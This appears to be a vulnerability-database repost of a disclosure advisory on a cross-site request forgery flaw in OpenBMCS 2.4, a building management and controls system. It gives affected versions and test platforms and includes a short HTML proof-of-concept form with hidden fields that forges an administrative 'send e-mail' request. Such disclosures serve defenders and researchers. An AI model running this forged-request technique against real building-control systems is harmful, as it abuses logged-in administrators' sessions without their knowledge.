Saturday, February 12, 2022

OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)

# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
# Date: 26/10/2021

OpenBMCS 2.4 CSRF Send E-mail

Product web page:
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
           Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
           Apache/2.4.41 (Ubuntu)
           Apache/2.4.25 (Debian)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2022-5691
Advisory URL:



    <form action="" method="POST">
      <input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
      <input type="hidden" name="message" value="Take me to your leader." />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="submit" value="Send" />

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore